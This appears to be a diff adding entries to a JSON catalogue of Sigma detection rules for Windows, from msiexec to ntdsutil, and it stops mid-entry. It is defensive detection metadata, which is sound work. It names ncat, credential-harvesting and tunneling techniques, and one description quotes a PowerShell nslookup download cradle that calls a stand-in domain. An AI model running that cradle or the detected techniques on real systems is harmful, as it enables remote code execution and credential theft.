"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "value": "Suspicious Msiexec Execute Arbitrary DLL" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_msiexec_install_quiet.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914244344799235", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "value": "Suspicious Msiexec Quiet Install" + }, + { + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_install_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "value": "Suspicious Msiexec Quiet Install From Remote Location" + }, + { + "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", + "meta": { + "author": "Alexander McDonald", + "creation_date": "2022/06/24", + "falsepositive": [ + "Legitimate use of Msra.exe" + ], + "filename": "proc_creation_win_msra_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", + "value": "Msra.exe Process Injection" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "WSL (Windows Sub System For Linux)", + "Other currently unknown software" + ], + "filename": "proc_creation_win_mstsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "value": "Remote Desktop Protocol Use Mstsc" + }, + { + "description": "Detects multiple suspicious process in a limited timeframe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_multiple_susp_cli.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-04-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" + ], + "tags": [ + "car.2013-04-002", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", + "value": "Quick Execution of a Series of Suspicious Commands" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2021/07/21", + "falsepositive": [ + "Legitimate ncat use" + ], + "filename": "proc_creation_win_netcat_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "value": "Ncat Execution" + }, + { + "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "meta": { + "author": "Sander Wiebing", + "creation_date": "2020/05/23", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "value": "Netsh RDP Port Opening" + }, + { + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "meta": { + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_add.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "value": "Netsh Port or Application Allowed" + }, + { + "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", + "meta": { + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/05/25", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", + "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "value": "Netsh Program Allowed with Suspcious Location" + }, + { + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "meta": { + "author": "frack113", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_delete.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "value": "Netsh Firewall Rule Deletion" + }, + { + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" + }, + { + "description": "Detects capture a network trace via netsh.exe trace functionality", + "meta": { + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "value": "Capture a Network Trace with netsh.exe" + }, + { + "description": "Detects netsh commands that configure a port forwarding (PortProxy)", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "filename": "proc_creation_win_netsh_port_fwd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "value": "Netsh Port Forwarding" + }, + { + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_port_fwd_3389.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "value": "Netsh RDP Port Forwarding" + }, + { + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "meta": { + "author": "Andreas Hunkeler (@Karneades), oscd.community", + "creation_date": "2020/04/20", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", + "value": "Harvesting of Wifi Credentials Using netsh.exe" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_netsupport.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "value": "Use of NetSupport Remote Access Software" + }, + { + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "meta": { + "author": "frack113", + "creation_date": "2022/03/12", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_network_scan_loop.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://ss64.com/nt/for.html", + "https://ss64.com/ps/foreach-object.htmll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "value": "Suspicious Scan Loop Network" + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_network_sniffing.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "value": "Network Sniffing" + }, + { + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + ], + "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "5b768e71-86f2-4879-b448-81061cbae951", + "value": "Suspicious Manipulation Of Default Accounts" + }, + { + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "meta": { + "author": "Endgame, JHasenbusch (ported for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate use of net.exe utility by legitimate user" + ], + "filename": "proc_creation_win_net_enum.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "62510e69-616b-4078-b371-847da438cc03", + "value": "Windows Network Enumeration" + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "meta": { + "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", + "creation_date": "2019/01/16", + "falsepositive": [ + "Inventory tool runs", + "Administrative activity" + ], + "filename": "proc_creation_win_net_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" + ] + }, + "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "value": "Suspicious Reconnaissance Activity Using Net" + }, + { + "description": "Identifies creation of local users via the net.exe command.", + "meta": { + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." + ], + "filename": "proc_creation_win_net_user_add.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "value": "Net.exe User Account Creation" + }, + { + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_net_user_add_never_expire.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "value": "Net.exe User Account Creation - Never Expire" + }, + { + "description": "Detects when an admin share is mounted using net.exe", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators" + ], + "filename": "proc_creation_win_net_use_admin_share.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", + "value": "Mounted Windows Admin Shares with net.exe" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "proc_creation_win_new_network_provider.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "value": "New Network Provider - CommandLine" + }, + { + "description": "Detects creation of a new service.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user creates a service for legitimate reasons." + ], + "filename": "proc_creation_win_new_service_creation.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", + "value": "New Service Creation" + }, + { + "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate use of Nim on developer systems" + ], + "filename": "proc_creation_win_nimgrab.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "value": "Nimgrab File Download" + }, + { + "description": "Detects nltest commands that can be used for information discovery", + "meta": { + "author": "Craig Young, oscd.community, Georg Lauenstein", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate administration use but user must be check out" + ], + "filename": "proc_creation_win_nltest_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://attack.mitre.org/techniques/T1482/", + "https://attack.mitre.org/techniques/T1016/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016", + "attack.t1482" + ] + }, + "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "value": "Recon Activity with NLTEST" + }, + { + "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_node_abuse.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://nodejs.org/api/cli.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "value": "Node.exe Process Abuse" + }, + { + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate programs executing PowerShell scripts" + ], + "filename": "proc_creation_win_non_interactive_powershell.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f4bbd493-b796-416e-bbf2-121235348529", + "value": "Non Interactive PowerShell" + }, + { + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_non_priv_reg_or_ps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "value": "Non-privileged Usage of Reg or Powershell" + }, + { + "description": "Detects the use of NPS a port forwarding tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_nps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ehang-io/nps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", + "value": "NPS Tunneling Tool" + }, + { + "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "value": "Nslookup PowerShell Download" + }, + { + "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]", + "meta": { + "author": "Zach Mathis (@yamatosecurity)", + "creation_date": "2022/09/06", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.t1071.004" + ] + }, + "uuid": "72671447-4352-4413-bb91-b85569687135", + "value": "Nslookup PwSh Download Cradle" + }, + { + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/16", + "falsepositive": [ + "NTDS maintenance" + ], + "filename": "proc_creation_win_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + ], + "tags": [ + 